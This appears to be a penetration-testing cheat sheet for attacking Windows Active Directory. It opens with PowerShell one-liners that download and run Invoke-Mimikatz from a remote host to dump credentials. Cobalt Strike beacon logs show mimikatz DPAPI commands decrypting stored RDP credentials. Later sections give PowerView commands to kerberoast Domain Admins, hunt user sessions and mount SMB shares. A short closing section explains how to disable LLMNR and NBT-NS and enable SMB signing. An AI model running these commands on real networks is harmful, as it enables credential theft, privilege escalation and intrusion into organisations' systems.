powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/oeoFuI'); Invoke-Mimikatz -DumpCreds" powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/scripts/downloaded/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

Link to this headingExtracting Sessions from RDP

Locate the ‘Credentials’ directory for the current user

beacon> ls [*] Tasked beacon to list files in . [+] host called home, sent: 19 bytes [*] Listing: C:\Users\<user>\AppData\Local\Microsoft\Credentials\ Size Type Last Modified Name ---- ---- ------------- ---- 436b fil 10/27/2017 14:30:02 936A68B5AC87C545C4A22D1AF264C8E9 beacon> mimikatz dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" [*] Tasked beacon to run mimikatz's dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" command [+] host called home, sent: 863301 bytes [+] received output: **BLOB** dwVersion : 00000001 - 1 guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} dwMasterKeyVersion : 00000001 - 1 guidMasterKey : {37fe87d9-4d2d-4dc6-aa54-1a011f267940} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : 3c40f618fa2eeb9c8a048a0d2be1e25b dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : a5848e4b82558e8a7acd65965b0177a2 dwDataLen : 000000f0 - 240 pbData : c76436385f98c33901c9390ac51985bde9de189d02ea22ccfbd8eb2f430d5b2720a07d7bc26821e88a45d373fbf7fe97e5bdec91ed7f751852a6bd385b2e33ad4eb37dc3fa76d2b7a3f75652db41fb2f6a4ac362722016d434a8ec96e01593ab99dbb003ffcc5a5ed654c93aa55efb4cc25186d463abd82de133ddb6015d2bd8a4f56d63c61209315ec86127175482c7b9e03c4772a814c30c57f639b97c72e0f73896fa521d77057d60229f3f4a00f186395ad34e6c793c9a07464da70691d4d9a5c019c81d97e66a7178b85483e6571a2e6f8c066631d6b60eeb834132d16aa3f3515519a2fd72c589f6865dd75ffb dwSignLen : 00000014 - 20 pbSign : 0f7aca73255e6ee56546c5872eb1bb1cdb87f3ed

Extracting the key (using the SID of the current user in the path):

beacon> mimikatz dpapi::masterkey /in:"%localappdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc [*] Tasked beacon to run mimikatz's dpapi::masterkey /in:"%localappdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc command [+] host called home, sent: 863306 bytes beacon> mimikatz dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc [*] Tasked beacon to run mimikatz's dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc command [+] host called home, sent: 863306 bytes [+] received output: **MASTERKEYS** dwVersion : 00000002 - 2 szGuid : {37fe87d9-4d2d-4dc6-aa54-1a011f267940} dwFlags : 00000000 - 0 dwMasterKeyLen : 00000088 - 136 dwBackupKeyLen : 00000068 - 104 dwCredHistLen : 00000000 - 0 dwDomainKeyLen : 00000174 - 372 [masterkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 573921aedbae9e259ceab758c93423da rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : 26a67e0c533081bc0630285215b2712fe8fdfb2c5aa8ca7e956cafbe657fdf38726c79f2f6615d67144e570608b3ee8ee6ba8da73c52685f2c5885d09d1951dc6aa15d15fa158b24df986bf9a79790c7d26a2338f1ca5ae2286b172065eee239245453f61931b7dd [backupkey] **MASTERKEY** dwVersion : 00000002 - 2 salt : 0bb5ba78c3afdf64d592d7ee08f583d2 rounds : 00004650 - 18000 algHash : 00008009 - 32777 (CALG_HMAC) algCrypt : 00006603 - 26115 (CALG_3DES) pbKey : b440d2dbe5fdc0467cb0391f25e4c9dfea2a69257a6d86a37aed23644553223f20998a13549faed5b104e2e7424b3f3a2afe6cebdb9d90a27abb3e6626f8e0b3910c15053337987a [domainkey] **DOMAINKEY** dwVersion : 00000002 - 2 dwSecretLen : 00000100 - 256 dwAccesscheckLen : 00000058 - 88 guidMasterKey : {9b9cbac1-259d-43ae-a73d-a4691113e495} pbSecret : 3a29d464f26e1c729afcabe90850b893835b321c4034b0743999156beae3d962f2b474b6cd06e4d1afc1211e815818a37e9cb0bba6d17ce43e3788e35b9067f04ddba73add66af826f149a9d89d8e0080343f5b6a3242fec138c3add16e537fe0d3938d24db75296aaa4ec580f395e921acd293ad884d973050d5314841a6c1b4a8b50b4fbf28bac90c5b29346a5767571afbdc350ca7f3259d29c703da6be5399d211083380d99ef6c857784f5904019a10ac694b3d396c0fb516ae9567d813055d62c8a5321324bd03791df7cfddf155c084986a91dd52bb3b4be1361145ebefdf233c985fecaf3c9d33fbcb33f995329b01bb154eb4e35865f910185b0c75 pbAccesscheck : 3761e28d733e8e9f857797275b312d94d1d3dee09260ee1183b5efeae95a487f03e330e6bf8bda8cd5a212da773906f88ad8034c0680731906bc5e533ec6f7893e30cd01de709363d46da3d55995f0f007335d80b1140e1e Auto SID from path seems to be: S-1-5-21-1396373213-2872852198-2033860859-1151 [domainkey] with RPC [DC] 'lab.local' will be the domain [DC] 'dc1.lab.local' will be the DC server key : 40fc84e4d4f44[...]7067 sha1: fcfcfa4cf4f4a89ae9375bc6edd9a15b2c876cea

Default Mimikatz:

beacon> mimikatz dpapi::cache [*] Tasked beacon to run mimikatz's dpapi::cache command [+] host called home, sent: 863302 bytes [+] received output: CREDENTIALS cache ================= MASTERKEYS cache ================ DOMAINKEYS cache ================

Specific masterkey:

beacon> mimikatz dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" /masterkey:40fc84e4d4f44[...]7067 [*] Tasked beacon to run mimikatz's dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" /masterkey:40fc84e4d4f44[...]7067 command [+] host called home, sent: 863301 bytes [+] received output: **BLOB** dwVersion : 00000001 - 1 [...] Decrypting Credential: * masterkey : 40fc84e4d4f44[...]7067 **CREDENTIAL** credFlags : 00000030 - 48 credSize : 000000ec - 236 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 27/10/2017 13:30:02 unkFlagsOrSize : 00000030 - 48 Persist : 00000002 - 2 - local_machine AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:target=TERMSRV/srv1.lab.local UnkData : (null) Comment : (null) TargetAlias : (null) UserName : LAB\<user> CredentialBlob : <password_will_be_here> Attributes : 0

Link to this headingDomain Enumeration

Enumeration from a machine not joined in the domain:

In order to execute in the context of a domain user without joining your system in the domain you have to do the following

runas /netonly /user:fqdn.domain.com\user cmd.exe

Powerview needs the DNS to be set to the organisation DNS to work.

Get All SPN users from a group (recursive) and preview Username / SPN:

get-domaingroupmember -identity "Domain Admins" -recurse| % {get-domainuser -spn -identity $_.membername -properties samaccountname,serviceprincipalname}|fl

Automated kerberoast of recurse users in privileged groups:

get-domaingroupmember -identity "Domain Admins" -recurse| % {get-domainuser -spn -identity $_.membername}| % {invoke-kerberoast -identity $_.samaccountname}

Link to this headingOther Users

powerview (master branch)
Invoke-UserHunter -Stealth -StealthSource [OPT] -StopOnSuccess

DFS (Distributed File System) share can be used as a -StealthSource if user profiles are stored using
\CORP\PROFILE\H<username>\workstation
instead of
\SHARE_SERVER\PROFILE\H<username>\workstation

Correlating group membership information with active sessions:

get-netgroupmember -groupname "domain admins" | foreach-object { Get-netgroupmember -groupname $_.MemberName } | foreach-object {$_.MemberName} | tee-object admin-users.txt cat .\admin-users.txt | foreach { select-string $_ .\active_sessions.log}

Link to this headingListing / Mounting Shares

smbclient -W "<domain>" -U "<username>%<password>" //<share-host>/<share-name> # Use -L for listing only # Note sure why, but "smbclient -L //ip-address" may succeed where "smbclient -L //hostname" may fail... mount -t cifs -o sec=ntlmssp,username=<username>,pass=<password>,domain=<domain> //<share-ip>/<share-name> /mnt/<local-share-destination>/

Use the commands below if you can’t connect with SMB on a share (which you know is open). It’s possible the version is too recent so you have to specify SMB3.

mount -v -t cifs -o username=<username>,domain=<domain>,vers=3.0 //<share-ip>/<share-name> /mnt/<local-share-destination>/ smbclient -m SMB3 -U <username> -W <domain> -d 6 //<share-ip>/<share-name>

Otherwise you may get this error:

$ smbclient -U CORP -L //192.168.56.101/C$/Tools WARNING: The "syslog" option is deprecated Enter CORP's password: protocol negotiation failed: NT_STATUS_CONNECTION_RESET $ smbclient -U CORP -m SMB3 -L //192.168.56.101/C$/Tools WARNING: The "syslog" option is deprecated Enter CORP's password: Domain=[JOHN-PC] OS=[] Server=[] Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC print$ Disk Printer Drivers Tools Disk Users Disk Connection to 192.168.56.101 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) NetBIOS over TCP disabled -- no workgroup available

Link to this headingFixing the Vulnerability

Disabling LLMNR via group policy:

  1. Open gpedit.msc
  2. Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
  3. Set Turn off multicast name resolution to Enabled

Disable NBT-NS:

  1. Go to network card properties
  2. Go to IPv4 > Advanced > WINS and then under “NetBIOS setting”
  3. Select Disable NetBIOS over TCP/IP

Disable NBT-NS by registry:

  1. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\{$InterfaceID}\NetbiosOptions
  2. Set the REG_DWORD to 2

Enable SMB signing via group policy:

  1. Open the gpedit.msc
  2. Open Computer Configuration | Windows Settings | Security Settings | Local Policies | Security Options
  3. Set Digitally sign communications (always)
  4. Set Digitally sign communications (if server agrees)
  5. Set Send unencrypted password to third-party SMB Servers

Enable SMB signing via registry:

  1. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkStation\ Parameters
  2. Create a DWORD called RequireSecuritySignature and set to 1